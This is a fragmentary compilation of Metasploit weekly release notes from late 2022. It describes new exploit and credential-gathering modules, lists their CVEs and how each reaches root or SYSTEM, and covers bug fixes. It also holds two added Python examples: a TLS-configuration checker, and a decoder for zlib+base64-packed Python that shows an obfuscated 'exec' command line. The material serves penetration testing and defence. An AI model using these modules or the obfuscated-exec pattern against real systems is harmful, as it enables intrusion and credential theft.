#17473 from adfoster-r7 – Updates the docs site to have an edit link at the bottom of each page which will take you to the corresponding markdown file on Github for editing.
#17480 from h00die – A new exploit alias has been added for payload modules; it performs the same action as to_handler, so users familiar with exploit modules can open a handler for a payload with the same familiar exploit command.
Bugs fixed (3)
#17385 from smashery – This fixes the file write and file append methods to return the expected Boolean values rather than nil.
#17482 from adfoster-r7 – Fixes a connection issue with reverse_https stagers that are executed on Windows servers attempting to negotiate TLS1 when Metasploit was using OpenSSL3.
#17491 from zeroSteiner – A bug has been fixed in the lib/msf/core/exploit/remote/ldap.rb library that handles LDAP communications for several modules to ensure that failures use the right namespace when throwing errors to prevent crashes.
Documentation
You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Author: Kali-Team
Type: Post
Pull request: #17337 contributed by cn-kali-team
Description: This adds a post-exploitation module that retrieves DBeaver session data from local configuration files. It is able to extract and decrypt credentials stored in these files for any version of DBeaver installed on Windows or Linux/Unix systems.
Gather MinIO Client Key
Author: Kali-Team
Type: Post
Pull request: #17341 contributed by cn-kali-team
Description: This adds a post module that gathers local credentials stored by the MinIO client on Windows, Linux, and macOS.
Enhancements and features (2)
#17427 from gwillcox-r7 – This adds YARD documentation to the LDAP libraries for developers to reference.
#17447 from gwillcox-r7 – We now utilize ‘pry’ dependencies with support for newer Ruby versions.
Bugs fixed (3)
#17386 from smashery – A bug has been fixed whereby the HTTP library was parsing HTTP HEAD requests like GET requests, which was causing issues due to non-compliance with RFC 9110. By updating the code to be more compliant with the standard, modules such as auxiliary/scanner/http/http_header now work as expected.
#17438 from ErikWynter – This fixes an issue in the exchange_proxylogon_collector module where it would crash if the LegacyDN was not present in the XML response.
#17454 from prabhatjoshi321 – A bug has been fixed whereby smb_enumshares incorrectly truncated file names before storing them into loot. This has been addressed so that only the console output will contain truncated file names, and the loot files will still contain the full file names for reference.
Documentation added (1)
#17395 from cgranleese-r7 – Adds documentation for both the JSON and MessagePack Metasploit RPC APIs – which is useful for programmatically interacting with Metasploit.
You can always find more documentation on our docsite at docs.metasploit.com.
Thankfully, it was a relatively quiet holiday break for security this year, so we hope everyone had a relaxing time while they could. This wrapup covers the last three Metasploit releases, and contains three new modules, two updates, and five bug fixes.
Make sure that your OpenTSDB isn’t too open
Of particular note in this release is a new module from community contributors Erik Wynter and Shai rod, which adds a new exploit module for CVE-2020-35476, an unauthenticated command injection vulnerability in the yrange parameter in OpenTSDB <= 2.4.0.
OpenTSDB is monitoring software that runs on top of Hadoop and HBase to allow users to serve large amounts of time-series data without losing any granularity in the data itself. If you are wondering what that hot mess of buzzwords means, it simply means that it is a database optimized to store events or measurements that are time-stamped. This also means that the target is likely to be storing a lot of metrics data, which may also include sensitive internal operations, making it a prime target for exploitation.
Successful exploitation of this vulnerability will result in remote code execution as the root user, meaning that an attacker can go from being completely unauthenticated to having full control over affected OpenTSDB devices. This could then allow the attacker to pivot further into the target network, using either the privileges they have gained on the OpenTSDB device, or details from the logs on the OpenTSDB device, which may provide insight into weaknesses of the network or give access to sensitive information.
New module content (3)
Linear eMerge E3-Series Access Controller Command Injection by Gjoko Krstic (gjoko[at]applied-risk.com) and h00die-gr3y, which exploits CVE-2019-7256, an unauthenticated command injection vulnerability in Linear eMerge E3 versions 1.00-06 and below in the No and door parameters of card_scan_decoder.php. Successful exploitation results in RCE as the root user.
#17258 from h00die – This updates the SharpHound post module to use version 1.1.0 of SharpHound, which works with Bloodhound 4. This includes both the .ps1 and binary from the original repository.
#17380 from smashery – The list of user agent strings inside lib/rex/user_agent.rb has been updated to reflect the latest user agents as of December 2022.
Bugs fixed (5)
#17334 from bcoles – Multiple improvements to modules/post/linux/gather/enum_commands, including fixing a crash when attempting to search a path that doesn’t exist.
#17389 from ErikWynter – log4shell_header_injection bugfix to prevent NoMethodError for nil:NilClass.
#17409 from adfoster-r7 – Update rhost walker to handle interrupt signal.
#17416 from MegaManSec – The jenkins_gather.rb module has been updated to use .blank? instead of .empty? when handling SSH Key details to prevent crashes should the various elements of the SSH Key be empty or nil.
#17435 from jmartin-r7 – A bug has been fixed whereby some modules were accidentally updated to use smtp_send_recv when they did not import the required Exploit::Remote::SMTPDeliver mixin. These modules have been updated to use the appropriate raw_send_recv method instead.
It’s been another gangbusters year for Metasploit, and the holidays are a time to give thanks to all the people that help make our load a little bit lighter. So, while this end-of-year wrap-up is a highlight reel of the headline features and extensions that landed in Metasploit-land in 2022, we also want to express our gratitude and appreciation for our stellar community of contributors, maintainers, and users. The Metasploit team merged 824 pull requests across Metasploit-related projects in 2022, more than 650 of which were incorporated into the main metasploit-framework repository. If you fixed a typo, linked a new reference, or cleaned up some code spaghetti, thank you!
Active Directory Certificate Services attacks
For years now, penetration testers and attackers have emphasized Active Directory as a particularly juicy and valuable attack surface area. In 2021, we saw fresh attack research that outlined new techniques for targeting Active Directory Certificate Services, or AD CS, including multiple configuration flaws that can be leveraged to escalate permissions from a domain user to a privileged account. In response to requests from our user community, Metasploit released two modules in the second half of 2022 that support AD CS attack techniques:
auxiliary/gather/ldap_esc_vulnerable_cert_finder can be used by an authenticated AD user to enumerate Certificate Authorities (CAs) and find vulnerable certificate templates.
auxiliary/admin/dcerpc/icpr_cert allows users to issue certificates from AD CS with a few options that are used for exploiting some escalation (ESC) scenarios. Currently only escalation technique 1 (ESC1) can be exploited with the available options, but support for more techniques is planned.
Linux credential extraction with Mimipenguin
Metasploit expanded our post-exploitation capabilities for extracting plaintext credentials on Linux systems by porting the Mimipenguin utility to Metasploit. This allows users to extract credentials for a variety of services from an established Meterpreter session, including the gnome-keyring-daemon, vsftpd and sshd. Under the hood, this functionality uses a new Meterpreter API that allows searching through process memory.
Metasploit plays well with others
This year Metasploit added a few different ways of supporting interoperability with other offensive security tools. First up is the BOF Loader for COFF files, which enables usage of Cobalt Strike’s Beacon Object File format from within the Windows Meterpreter. This extension can also use BOF files written for Sliver. We’ve also made an improvement this year to allow users to bring their own payloads and stages from other tools and formats. If you’re a Sliver user, you can now deploy a Sliver agent as a custom payload stage, and we will use our own Metasploit stagers to upload and run the custom shellcode on the target.
Holiday hacking challenge
Metasploit teamed up with TryHackMe to deliver a challenge as part of their Advent of Cyber event, which ran for the month of December. The Metasploit challenge debuted on December 9 and walked users through a fun Christmas-themed story where they were able to use some of Metasploit’s latest pivoting capabilities. A walk-through is available under Task 9 on the official event page.
Sixth getsystem technique
Metasploit added a new technique to everyone’s favorite Meterpreter command in the middle of 2022 with help from cdelafuente-r7, who incorporated the newest named-pipe impersonation-based technique (the EfsPotato variant). This particular vulnerability affects Windows Vista / Server 2008 and later, and the technique can be executed entirely in memory to escalate the current session to NT AUTHORITY\SYSTEM without spawning a new process. For more information about this and other getsystem techniques, check out the new module documentation. (Pro tip: Specific techniques can be used by number!)
Post API improvements and maintenance
Community member bcoles made more than 100 pull requests to improve and maintain the post-exploitation API used by Metasploit’s 400+ post modules. This enormous effort is greatly appreciated and has fixed numerous bugs, added new functionality, and made general improvements that benefit both end users and module developers alike. Among those improvements are removing quite a few lingering Meterpreter scripts (which were replaced by post modules in 2011) and adding shell session support for a few enumeration modules. The shell session support is particularly useful when combined with 2021’s payload-less session improvements because it bypasses the need to address evasion with Meterpreter.
New contributors
We would like to thank the community for all the work done this year. Particularly, we want to give a big shout out to the 45 new contributors that added great content to Metasploit. Some of these folks even added modules for celebrity vulnerabilities or flaws that were being actively exploited in the wild, such as Apache Spark RCE (CVE-2022-33891), Spring Cloud Gateway RCE (CVE-2022-22947) or Spring Framework RCE (CVE-2022-22965). We’re grateful to all our contributors for submitting modules that help organizations test their defenses, demonstrate risk, and prioritize mitigations.
exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144 – Despite having a 2021 CVE, this particular vulnerability, contributed by community member h00die-gr3y, gained attention in 2022 for being an unauthenticated RCE in VMware’s NSX product. Being a deserialization vulnerability, exploitation is smooth and reliable.
auxiliary/gather/ldap_query – This new module allows users to gather useful information from an Active Directory Domain Services (AD DS) LDAP server. Metasploit currently includes 28 predefined queries for common actions like enumerating LAPS passwords, computer accounts, and users with configured Service Principal Names (SPNs) for Kerberoasting. Metasploit users can even define their own queries for use with the module.
exploit/linux/local/vcenter_java_wrapper_vmon_priv_esc – This module, from community contributor h00die, added in support for CVE-2021-22015. vCenter is frequently targeted by attackers, so h00die’s contribution goes a long way in helping pen testers better assess the security of vCenter servers during their engagements.
exploit/linux/http/cisco_asax_sfr_rce – This module was added by jbaines-r7 and incorporated an exploit for CVE-2022-20828 that allows authenticated attackers to gain root-level shells on vulnerable Cisco ASA-X devices with FirePOWER Services enabled. These devices are frequently positioned in sensitive pivots within networks, and are prime targets for attackers, so gaining RCE on these devices often results in access to privileged networks and/or data.
exploit/multi/veritas/beagent_sha_auth_rce – This module from community contributor c0rs exploits CVE-2021-27876, CVE-2021-27877 and CVE-2021-27878 in Veritas Backup Exec Agent to bypass authentication and gain remote code execution as SYSTEM/root. This is quite a nice vulnerability since backup agents typically have access to sensitive information, so any compromise of such devices typically leads to access to sensitive company data. Combine this with SYSTEM/root privileges as an unauthenticated remote user, and you have a decent vulnerability for gaining initial access into a network and gaining information to start your pivoting attempts to other segments of that network.
Version 6.2 released
Over the summer, the Metasploit team announced the release of Metasploit Framework 6.2, which included a number of new features. Some of the highlights:
A streamlined authentication capturing plugin
An SMB 2 and 3-capable file server
Improved options for handling NATed services
Improved SMB relaying
We’re planning a 6.3 feature release in early 2023, so stay tuned for the next round of new Metasploit capabilities and improvements!
E-Z-2-contribute documentation
As of the 6.2 release, Metasploit has a new, user-contributable docs site at https://docs.metasploit.com/. Want to contribute to Metasploit, but don’t want to monkey around with Ruby or exploit code? We can always use more and better documentation on your favorite Metasploit features, workflows, and improvements. Get in there and help us teach people how hacking works!
From all of us at Rapid7, we wish you a very happy new year. As always, you can get the latest Metasploit updates every Friday in our weekly wrap-up, and you can stay up-to-date on vulnerability intelligence with AttackerKB.
A sack full of cheer from the Hacking Elves of Metasploit
It is clear that the Metasploit elves have been busy this season: Five new modules, six new enhancements, nine new bug fixes, and a partridge in a pear tree are headed out this week! (Neither partridge nor pear tree included.) In this sack of goodies, we have a gift that keeps on giving: Shelby’s Acronis TrueImage Privilege Escalation works wonderfully, even after the software is uninstalled.
If you prefer elf files to holiday elves, we’ve still got you covered
Jan Rude submitted two modules targeting Syncovery for Linux. One takes advantage of an insecure session token generator and allows for the brute-force creation of a token that matches that of a logged-in user, and the other allows an authenticated user to create a job that will run when a user’s profile is run.
New module content (5)
Syncovery For Linux Web-GUI Session Token Brute-Forcer by Jan Rude, which exploits CVE-2022-36536 – A new login scanner module that brute-forces a valid session token for the Syncovery File Sync & Backup Software Web-GUI. This will work if the default user is already logged in to the application. If they do not log out, the token stays valid until the next reboot.
Acronis TrueImage XPC Privilege Escalation by Csaba Fitzl and Shelby Pace, which exploits CVE-2020-25736 – This module exploits a local privilege escalation vulnerability in Acronis TrueImage versions 2019 update 1 through 2021 update 1 on macOS. This vulnerability is identified as CVE-2020-25736. By abusing a local helper executable, it is possible to execute arbitrary commands as the root user.
Syncovery For Linux Web-GUI Authenticated Remote Command Execution by Jan Rude, which exploits CVE-2022-36534 – This adds a module that exploits an authenticated remote code execution vulnerability identified as CVE-2022-36534 in the Web GUI of Syncovery File Sync & Backup Software for Linux. The module leverages a flaw in the application that allows the creation of jobs that will be executed when a profile is run. This allows the execution of arbitrary commands as the root user.
#17191 from liangjs – This PR fixes a bug where the Windows Subsystem for Linux crashes when using a reverse_tcp x64 stager because of data in the upper bits of the RDI register when the syscall occurs.
#17255 from JustAnda7 – The command payloads have been updated to allow specifying the file system path for several of their commands within datastore options. This should allow users to specify these commands locations should they not be contained within the searchable PATH.
#17346 from adfoster-r7 – The logic for counting threads within lib/metasploit/framework/spec/threads/suite.rb has been updated to appropriately count and document the known threads that can be left behind when running the rspec test suite. This fixes an intermittent rspec crash.
#17355 from adfoster-r7 – The creds command has been updated to show the full SSH key contents when running the creds -v command or when exporting to a file with creds -o output.txt. Previously only a shortened fingerprint string would be shown to the user.
#17357 from adfoster-r7 – The docs site has been updated to support mermaid graphs for rendering diagrams to assist with explanations.
#17387 from smashery – The hosts, services, vulns and notes commands have been updated to support tab expansion in paths using the ~ character when using the -o option to specify the path to the file to write the output to.
Bugs fixed (9)
#17345 from adfoster-r7 – A crash has been fixed when using the report API with verbose mode enabled and no active DB.
#17350 from smashery – This updates three UAC bypass modules to remove a hard-coded delay in favor of using the module’s built-in cleanup method. This results in the user having access to the interactive session without needing to wait.
#17351 from smashery – This fixes an issue in the exploit/windows/local/s4u_persistence module where the default value for FREQUENCY would cause an error.
#17352 from smashery – A bug has been fixed in the file_version method for Windows Meterpreter, which would cause the session to crash if it was run on a file that did not exist on the target system.
#17361 from jmartin-r7 – A bug has been fixed that would cause a crash when running the exit command from within msfconsole when running msfconsole with a 3.1.x release of Ruby.
#17366 from zeroSteiner – The upload and download commands used by shell sessions have been updated to handle directory destinations in the same way as the Meterpreter equivalents do, and to fix some bugs when uploading and downloading files that would prevent errors from being displayed and might cause session crashes.
#17368 from adfoster-r7 – Fixes a regression issue with msfvenom payload generation for large payloads taking more than 5 minutes to generate when outputting as hex format. Now it takes a few seconds as normal.
#17370 from jmartin-r7 – A bug has been fixed in smb_enumshares.rb whereby, if an SMBv1 connection was used, the net_share_enum_all function was called on the wrong object. This has since been updated to address this error.
#17378 from gwillcox-r7 – A bug has been fixed in the Meterpreter payloads that was preventing Python Meterpreter from being able to utilize its EventLog API properly. Additionally, a bug has been fixed in the COFFLoader that prevented BOFLoader from working with some COFF files.
Jan Rude added a new module that gives users the ability to brute-force login for Linux Syncovery. This expands Framework’s capability to scan logins to Syncovery, a popular web GUI for backups.
WordPress extension SQL injection module
Cydave, destr4ct, and jheysel-r7 contributed a new module that takes advantage of a vulnerable WordPress extension. This allows Framework users to take advantage of CVE-2022-0739, leveraging a UNION-based SQL injection to gather hashed passwords of WordPress users. For vulnerable versions, anyone who can access the BookingPress plugin page will also have access to all the credentials in the database, yikes! There are currently 3,000 active installs of the plugin, which isn’t a huge number by WordPress standards—but the ease of remote exploitation makes it a fun addition to the framework.
VMware vCenter "vScalation" Privilege Escalation by Yuval Lazar and h00die, which exploits CVE-2021-22015 – This PR adds a privilege escalation for users in the cis group to escalate to root on certain versions of vCenter. A service file /usr/lib/vmware-vmon/java-wrapper-vmon has improper permissions allowing cis group members to write to it. Upon host reboot or vmware-vmon service restart, a root shell is obtained.
Enhancements and features (2)
#17214 from h00die – This PR improves upon the data gathered on a vCenter server originally implemented in #16871, including library integration, optimization, and de-duplication.
#17332 from bcoles – Updates windows/gather/enum_proxy to support non-Meterpreter sessions (shell, PowerShell).
Bugs fixed (5)
#17183 from rbowes-r7 – This adds some small changes, cleanups, and fixes to the linux/http/zimbra_unrar_cve_2022_30333 and linux/http/zimbra_cpio_cve_2022_41352 Zimbra exploit modules, along with linux/local/zimbra_slapper_priv_esc documentation. Particularly, this fixes an issue that prevented the exploit modules from working properly when the handler was prematurely shut down.
#17305 from cgranleese-r7 – Updates Metasploit’s RPC to automatically choose an appropriate payload if module.execute is invoked without a payload set. This mimics the functionality of msfconsole.
#17323 from h00die – Fixes a bug when attempting to detect enlightenment_sys in exploits/linux/local/ubuntu_enlightenment_mount_priv_esc.
#17330 from zeroSteiner – This fixes an issue in the ProxyShell module, which limited the email enumeration to 100 entries. Now, it correctly enumerates all the emails before finding one that is suitable for exploitation.
#17342 from gwillcox-r7 – This adds the necessary control to the search queries used to find vulnerable certificate templates in an AD CS environment. Prior to this, non-privileged users would not be able to read the security descriptor field.
ProxyNotShell
This week’s Metasploit release includes an exploit module for CVE-2022-41082, AKA ProxyNotShell by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, Orange Tsai, Piotr Bazydło, Rich Warren, Soroush Dalili, and our very own Spencer McIntyre. The vulnerability CVE-2022-41082, AKA ProxyNotShell is a deserialization flaw in Microsoft Exchange’s PSRP backend. Microsoft Exchange Server 2019, Exchange Server 2016 and Exchange Server 2013 are vulnerable to a server-side request forgery (SSRF) attack and remote code execution. An authenticated attacker can use the combination of these two vulnerabilities to elevate privileges and execute arbitrary code on the target Exchange server. For more information, see CVE-2022-41082 and CONTROL YOUR TYPES OR GET PWNED. The ProxyNotShell exploit also added new Exchange SSRF functionality that allows both it and the previous ProxyShell module to target Exchange server instances which utilize a Data Access Group (DAG) backend. The Metasploit team has yet to see another public Proof of Concept that takes this configuration type into account.
Remote Control Collection RCE
Community contributors h00die and H4rk3nz0 also introduced another exploit module in this week’s release. This module targets the Remote Control Collection software, which allows a remote user to connect from a mobile device and execute screen commands. Note that this module will only deploy a payload if the server is set up without a password (the default). As a side note, if you’re looking to learn more about how you can use Metasploit to test servers for remote code execution vulnerabilities, you might find this video (https://www.youtube.com/watch?v=eLbBR956Tgw) helpful.
New module content (2)
Microsoft Exchange ProxyNotShell RCE by DA-0x43-Dx4-DA-Hx2-Tx2-TP-S-Q, Orange Tsai, Piotr Bazydło, Rich Warren, Soroush Dalili, and Spencer McIntyre, which exploits CVE-2022-41082 – This adds an exploit module for CVE-2022-41082, AKA ProxyNotShell. This vulnerability is a deserialization flaw in Microsoft Exchange’s PSRP backend. The PSRP backend can be accessed by an authenticated attacker leveraging the SSRF flaw identified as GHSA-6ph7-8wxv-6gf2. Together, these vulnerabilities allow an authenticated attacker to execute arbitrary commands on a Microsoft Exchange Server.
Remote Control Collection RCE by H4rk3nz0 and h00die – This PR adds an exploit targeting the Remote Control Server software which allows remote control of a PC, now including running a payload.
Enhancements and features (1)
#17304 from om3rcitak – Improves auxiliary/scanner/http/tomcat_mgr_login.rb error message on 401 status codes to include the user defined URI.
Bugs fixed (2)
#17163 from jheysel-r7 – This fixes a bug in the check method where we left an artifact on disk.
#17299 from smashery – This fixes a bug in the polkit_dbus_auth_bypass module that prevented it from working with certain session types.
These discoveries were made by our very own Ron Bowes, who developed an exploit module for authenticated RCE against F5 devices running in appliance mode to achieve a Meterpreter session as the root user.
Ron Bowes has also developed an F5 Metasploit module exploiting CVE-2022-41622, a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below – which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.
For more information, see Rapid7’s blog post, which details the vulnerabilities.
DuckyScript support
Community contributor h00die contributed an enhancement to msfvenom. This adds the ducky-script-psh format to msfvenom:
F5 BIG-IP iControl CSRF File Write SOAP API by Ron Bowes, which exploits CVE-2022-41622 – This module exploits a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.
ChurchInfo 1.2.13-1.3.0 Authenticated RCE by m4lwhere, which exploits CVE-2021-43258 – A new module has been added for CVE-2021-43258 which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the www-user user.
Enhancements and features (6)
#17145 from k0pak4 – This PR adds the ability to authenticate via hash and improves the error reporting when authentication fails.
#17279 from h00die – This adds the ducky-script-psh format to msfvenom so it can create payloads that are compatible with Bad USB devices such as the Flipper Zero.
#17283 from bcoles – Improves the linux/gather/enum_psk module, and adds documentation.
#17284 from bcoles – Updates modules/post/linux/gather/enum_network and modules/post/linux/gather/tor_hiddenservices to extract hostname details in a similar fashion to other modules.
#17285 from bcoles – Improves validation in linux/gather/tor_hiddenservices to ensure that the locate command is present before running the module.
#17296 from jmartin-r7 – Adds clarification to the module documentation that links to external resources are not controlled by project maintainers. These external resources may no longer exist and are subject to malicious takeover in the future. These links should be reviewed accordingly.
Bugs fixed (1)
#17277 from adfoster-r7 – Fixes a crash within the python reverse http stager.
Pre-authenticated Remote Code Execution in VMware NSX Manager using XStream (CVE-2021-39144)
There’s nothing quite like a pre-authenticated remote code execution vulnerability in a piece of enterprise software. This week, community contributor h00die-gr3y added a module that targets VMware NSX Manager using XStream. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of root on the appliance. VMware saw this vulnerability as such a risk, and they decided to release patches for versions that were no longer supported, which goes to show the value that this module provides.
Using Gitea in your environment? You better git-to-patching. Community contributor krastanoel wrote an awesome module which exploits a remote code execution vulnerability in versions of Gitea before 1.16.7. The vulnerability, identified as CVE-2022-30781, is due to the application running a git fetch command into which an attacker can inject arbitrary commands, resulting in code execution as the git user.
Metasploit on Twitch
This week Metasploit’s very own Spencer McIntyre went live on Twitch and went over writing Meterpreter features in Metasploit. Be sure to check out the recording and stay tuned for more fun and informative Metasploit streaming sessions.
New module content (2)
VMware NSX Manager XStream unauthenticated RCE by Sina Kheirkhah, Steven Seeley, and h00die-gr3y, which exploits CVE-2021-39144 – This adds an exploit module that leverages a Remote Command Injection vulnerability in VMware Cloud Foundation 3.x and NSX Manager Data Center for vSphere up to and including version 6.4.13. This vulnerability is identified as CVE-2021-39144.
Gitea Git Fetch Remote Code Execution by krastanoel, li4n0, and wuhan005, which exploits CVE-2022-30781 – This adds an exploit module that leverages a command injection vulnerability in Gitea. Due to an improper escaping of input, it is possible to execute commands on the system abusing the Gitea repository migration process. This vulnerability is identified as CVE-2022-30781 and affects Gitea versions prior to 1.16.7.
Enhancements and features (2)
#17243 from adfoster-r7 – Improves the TLV packet logging for Railgun.
#17253 from h00die – The list of WordPress plugins and themes has been updated to allow Metasploit tools to scan for a wider range of known themes and plugins on WordPress targets.
Bugs fixed (2)
#17260 from zeroSteiner – This fixes an issue with the RBCD module due to the access_mask field of the Access Control Entry types being changed from the AccessMask type to an integer.
#17263 from zeroSteiner – The Metasploit-payloads gem has been bumped to 2.0.101, which fixes memory and handle leaks when using the incognito plugin’s list_token functionality. It also updates the Mimikatz code in Metasploit to pull in the latest changes.
#17261 from zeroSteiner – This fixes support for port forwarding on Ruby 3 with meterpreter payloads.
#17264 from gwillcox-r7 – This bumps the Go version from 1.11.2 to 1.19.3 in the metasploit-framework Dockerfile.
Our very own Grant Willcox has developed a new module which allows users to query a LDAP server for vulnerable Active Directory Certificate Services (AD CS) certificate templates. The module will print the detected certificate details, and the attack it is susceptible to. This module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.
Example module output showing an identified vulnerable certificate template:
Community member h00die has made improvements to Metasploit's SSL scanner modules, combining the functionality of the two existing modules auxiliary/scanner/http/ssl.rb and auxiliary/scanner/http/ssl_version.rb into one new module, auxiliary/scanner/ssl/ssl_version.rb. This new module adds checks for deprecated protocols, expired or not-yet-valid certificates, low key strength, NULL cipher suites, certificates signed with MD5, DROWN, RC4 ciphers, exportable ciphers, LOGJAM, and BEAST.
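The checks listed here (and again under the SSL/TLS Version Detection entry below) are all rule evaluations over what a scanner observed. The following added example, which is not the module's own code, shows that rule set applied to a constructed scan result: the protocols the server accepted, the OpenSSL-style cipher suite names accepted per protocol, and a few leaf-certificate facts. Thresholds such as "RSA below 2048 bits" and the "-SHA suffix means CBC" heuristic are assumptions made for the example, not values taken from the module.

```python
"""Rule set for common TLS configuration findings (added example)."""
from datetime import datetime, timezone

DEPRECATED_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
MIN_KEY_BITS = {"RSA": 2048, "DSA": 2048, "EC": 256}   # assumed thresholds


def is_cbc(suite: str) -> bool:
    # Heuristic for OpenSSL names: explicit CBC, or a "-SHA" HMAC suffix that is not RC4/NULL.
    if "CBC" in suite:
        return True
    return suite.endswith("-SHA") and "RC4" not in suite and "NULL" not in suite


def cert_findings(cert: dict, now: datetime) -> list:
    out = []
    if cert["not_after"] < now:
        out.append("expired certificate")
    if "md5" in cert["signature_algorithm"].lower():
        out.append("certificate signed with MD5")
    if cert["key_bits"] < MIN_KEY_BITS.get(cert["key_type"], 0):
        out.append("low key strength (%s %d bits)" % (cert["key_type"], cert["key_bits"]))
    return out


def cipher_findings(accepted: dict, dh_bits=None) -> list:
    """`accepted` maps protocol name -> cipher suites the server accepted on it."""
    out = []
    if "SSLv2" in accepted:
        out.append("DROWN (SSLv2 enabled)")
    for proto in sorted(accepted):
        if proto in DEPRECATED_PROTOCOLS:
            out.append("deprecated protocol %s" % proto)
    suites = {s for names in accepted.values() for s in names}
    if any("NULL" in s for s in suites):
        out.append("NULL cipher suite")
    if any("RC4" in s for s in suites):
        out.append("RC4 cipher suite")
    if any(s.startswith("EXP") for s in suites):
        out.append("export-grade cipher suite")
    # LOGJAM: export-grade ephemeral DH suites, or a DH modulus of 1024 bits or less.
    weak_dhe = any(s.startswith("EXP") and ("DHE" in s or "EDH" in s) for s in suites)
    if weak_dhe or (dh_bits is not None and dh_bits <= 1024):
        out.append("LOGJAM (weak DHE)")
    # BEAST: a CBC suite accepted over SSLv3 or TLSv1.0.
    for proto in ("SSLv3", "TLSv1.0"):
        if any(is_cbc(s) for s in accepted.get(proto, [])):
            out.append("BEAST (CBC over %s)" % proto)
    return out


def scan_findings(scan: dict, now: datetime) -> list:
    return cipher_findings(scan["accepted"], scan.get("dh_bits")) + cert_findings(scan["cert"], now)


# Constructed scan results; neither describes a real host.
WEAK_SCAN = {
    "accepted": {
        "TLSv1.0": ["AES128-SHA", "RC4-SHA", "EXP-EDH-RSA-DES-CBC-SHA"],
        "TLSv1.2": ["ECDHE-RSA-AES128-GCM-SHA256", "AES256-SHA"],
    },
    "cert": {"not_after": datetime(2022, 1, 1, tzinfo=timezone.utc),
             "signature_algorithm": "md5WithRSAEncryption", "key_type": "RSA", "key_bits": 1024},
}
CLEAN_SCAN = {
    "accepted": {"TLSv1.2": ["ECDHE-RSA-AES256-GCM-SHA384"], "TLSv1.3": ["TLS_AES_256_GCM_SHA384"]},
    "cert": {"not_after": datetime(2024, 1, 1, tzinfo=timezone.utc),
             "signature_algorithm": "sha256WithRSAEncryption", "key_type": "RSA", "key_bits": 2048},
}

if __name__ == "__main__":
    now = datetime(2022, 11, 24, tzinfo=timezone.utc)
    for label, scan in (("weak", WEAK_SCAN), ("clean", CLEAN_SCAN)):
        print(label, scan_findings(scan, now) or ["no finding"])
```

Passing `now` explicitly keeps the expiry check deterministic for tests and lets the same rules be replayed against historical scan data.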
Reduced Python payload sizes
Community member llamasoft has recently contributed improvements to our Python payloads, with the first change being a modification to the Python Meterpreter stage to calculate the necessary data for AES encryption at runtime – which helped reduce the stage size by about 6,000 bytes. This week’s Metasploit release includes compression support using zlib. This change reduces the size of the Python Meterpreter from 95kb to 24kb.
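The compression described above changes what a defender sees: the stage travels as a base64-encoded zlib stream rather than as readable Python. The added example below, which is not code from the contribution itself, shows the two sides of that for triage. `size_report` measures the reduction zlib gives on a constructed, deliberately repetitive source text (the 95 KB to 24 KB figure above is the real measurement; the sample here is only illustrative), and `recover_compressed_sources` scans a constructed process-creation log line for base64 runs that inflate to UTF-8 text, so an analyst can read what was actually executed.

```python
"""Inspect zlib+base64 wrapped Python found in command lines (added example)."""
import base64
import re
import zlib

# Runs of base64 alphabet long enough to be a payload rather than an identifier (assumed 40+).
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Constructed, harmless sample source; repetition makes the compression effect visible.
SAMPLE_SOURCE = "".join(
    "def handler_%d(msg):\n    return {'channel': %d, 'body': msg, 'ok': True}\n" % (i, i)
    for i in range(12)
)


def size_report(source: str) -> dict:
    """Raw, zlib-compressed and base64-wrapped sizes of `source` in bytes."""
    raw = source.encode("utf-8")
    packed = zlib.compress(raw, 9)
    return {"raw": len(raw), "compressed": len(packed), "base64": len(base64.b64encode(packed))}


def sample_log_line(source: str) -> str:
    """Constructed log line in the shape a process-creation event records for such a stage."""
    blob = base64.b64encode(zlib.compress(source.encode("utf-8"), 9)).decode("ascii")
    return ("CommandLine: python -c \"import base64,zlib;"
            "exec(zlib.decompress(base64.b64decode('%s')))\"" % blob)


def recover_compressed_sources(text: str) -> list:
    """Return (offset, source) for each base64 run in `text` that inflates to UTF-8 text."""
    found = []
    for m in B64_RUN.finditer(text):
        try:
            inflated = zlib.decompress(base64.b64decode(m.group(0), validate=True))
            found.append((m.start(), inflated.decode("utf-8")))
        except (ValueError, zlib.error):
            # Not valid base64, not a zlib stream, or not text: skip this run.
            continue
    return found


if __name__ == "__main__":
    print(size_report(SAMPLE_SOURCE))
    for offset, src in recover_compressed_sources(sample_log_line(SAMPLE_SOURCE)):
        print("blob at offset %d decodes to %d bytes of source" % (offset, len(src)))
        print(src[:120])
```

`base64.b64decode(..., validate=True)` raises `binascii.Error` (a `ValueError`) on anything outside the base64 alphabet or with bad padding, and `zlib.decompress` raises `zlib.error` on data that is not a zlib stream, so the scanner can try every long run cheaply and keep only the ones that inflate.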
New module content (4)
Misconfigured Certificate Template Finder by Grant Willcox – This adds a module that analyzes certificate templates to identify ones that are vulnerable to ESC1, ESC2 and ESC3. When a template is found to be vulnerable, the necessary information is printed for the user including the template name, the issuing CAs and the SIDs of the users that are able to issue them.
SSL/TLS Version Detection by todb, Chris John Riley, Veit Hailperin, et, and h00die, which detects CVE-2022-3358 – A new module modules/auxiliary/scanner/ssl/ssl_version.rb has been released which replaces the old SSL scanners and offers improved features such as SSL cipher suite checking, improvements to CA Issuers logic, support for expired certs and deprecated protocols, and better error handling.
Reverse Lookup IP Addresses by mubix and bcoles – Adds a new post/multi/recon/reverse_lookup module that reverse resolves an IP address or IP address range to hostnames. The old post/windows/gather/reverse_lookup and post/windows/recon/resolve_ip modules have been removed.
